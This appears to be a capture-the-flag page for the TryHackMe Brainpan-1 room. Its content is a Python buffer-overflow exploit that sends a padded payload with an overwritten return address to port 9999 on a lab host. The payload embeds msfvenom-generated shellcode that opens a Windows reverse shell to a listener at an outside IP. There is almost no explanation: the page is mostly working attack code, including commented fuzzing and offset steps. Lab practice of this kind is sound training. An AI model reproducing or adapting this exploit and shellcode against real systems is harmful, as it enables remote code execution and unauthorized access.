Skip to content

THM - Brainpan-1

Exploit

#!/usr/bin/env python3
import socket, time, sys, subprocess

ip = "10.10.55.121"
port = 9999

# payload = (b"A" * 100)
# payload = (b"A" * 524) + (b"B" * 4) + (b"C" * 468) + (b"D"*4)

# 0x311712f3
# \x31\x17\x12\xf3
# \xf3\x12\x17\x31

# payload = (b"A" * 524) + (b"\xf3\x12\x17\x31") + (b"C" * (468)) + (b"D"*4)

# msfvenom -p windows/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -b "\x00" -f python EXITFUNC=thread
buf =  b""
buf += b"\xda\xcb\xbb\x82\x84\x36\x0b\xd9\x74\x24\xf4\x5e\x2b"
buf += b"\xc9\xb1\x52\x31\x5e\x17\x03\x5e\x17\x83\x6c\x78\xd4"
buf += b"\xfe\x8c\x69\x9b\x01\x6c\x6a\xfc\x88\x89\x5b\x3c\xee"
buf += b"\xda\xcc\x8c\x64\x8e\xe0\x67\x28\x3a\x72\x05\xe5\x4d"
buf += b"\x33\xa0\xd3\x60\xc4\x99\x20\xe3\x46\xe0\x74\xc3\x77"
buf += b"\x2b\x89\x02\xbf\x56\x60\x56\x68\x1c\xd7\x46\x1d\x68"
buf += b"\xe4\xed\x6d\x7c\x6c\x12\x25\x7f\x5d\x85\x3d\x26\x7d"
buf += b"\x24\x91\x52\x34\x3e\xf6\x5f\x8e\xb5\xcc\x14\x11\x1f"
buf += b"\x1d\xd4\xbe\x5e\x91\x27\xbe\xa7\x16\xd8\xb5\xd1\x64"
buf += b"\x65\xce\x26\x16\xb1\x5b\xbc\xb0\x32\xfb\x18\x40\x96"
buf += b"\x9a\xeb\x4e\x53\xe8\xb3\x52\x62\x3d\xc8\x6f\xef\xc0"
buf += b"\x1e\xe6\xab\xe6\xba\xa2\x68\x86\x9b\x0e\xde\xb7\xfb"
buf += b"\xf0\xbf\x1d\x70\x1c\xab\x2f\xdb\x49\x18\x02\xe3\x89"
buf += b"\x36\x15\x90\xbb\x99\x8d\x3e\xf0\x52\x08\xb9\xf7\x48"
buf += b"\xec\x55\x06\x73\x0d\x7c\xcd\x27\x5d\x16\xe4\x47\x36"
buf += b"\xe6\x09\x92\x99\xb6\xa5\x4d\x5a\x66\x06\x3e\x32\x6c"
buf += b"\x89\x61\x22\x8f\x43\x0a\xc9\x6a\x04\x3f\x1c\x7d\x7b"
buf += b"\x57\x22\x7d\x92\xf4\xab\x9b\xfe\x14\xfa\x34\x97\x8d"
buf += b"\xa7\xce\x06\x51\x72\xab\x09\xd9\x71\x4c\xc7\x2a\xff"
buf += b"\x5e\xb0\xda\x4a\x3c\x17\xe4\x60\x28\xfb\x77\xef\xa8"
buf += b"\x72\x64\xb8\xff\xd3\x5a\xb1\x95\xc9\xc5\x6b\x8b\x13"
buf += b"\x93\x54\x0f\xc8\x60\x5a\x8e\x9d\xdd\x78\x80\x5b\xdd"
buf += b"\xc4\xf4\x33\x88\x92\xa2\xf5\x62\x55\x1c\xac\xd9\x3f"
buf += b"\xc8\x29\x12\x80\x8e\x35\x7f\x76\x6e\x87\xd6\xcf\x91"
buf += b"\x28\xbf\xc7\xea\x54\x5f\x27\x21\xdd\x7f\xca\xe3\x28"
buf += b"\xe8\x53\x66\x91\x75\x64\x5d\xd6\x83\xe7\x57\xa7\x77"
buf += b"\xf7\x12\xa2\x3c\xbf\xcf\xde\x2d\x2a\xef\x4d\x4d\x7f"


payload = (b"\x90" * 524) + (b"\xf3\x12\x17\x31") + (b"\x90" * (468 - len(buf))) + buf + (b"D"*4)


print("Pyadlod size: {} payload: {}".format(len(payload), payload))

try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(5)
        s.connect((ip, port))
        print(s.recv(1024))
        s.send(payload)
        print(s.recv(1024))
except:
    print("Fuzzing crached at {} bytes".format(len(payload)))
    sys.exit(0)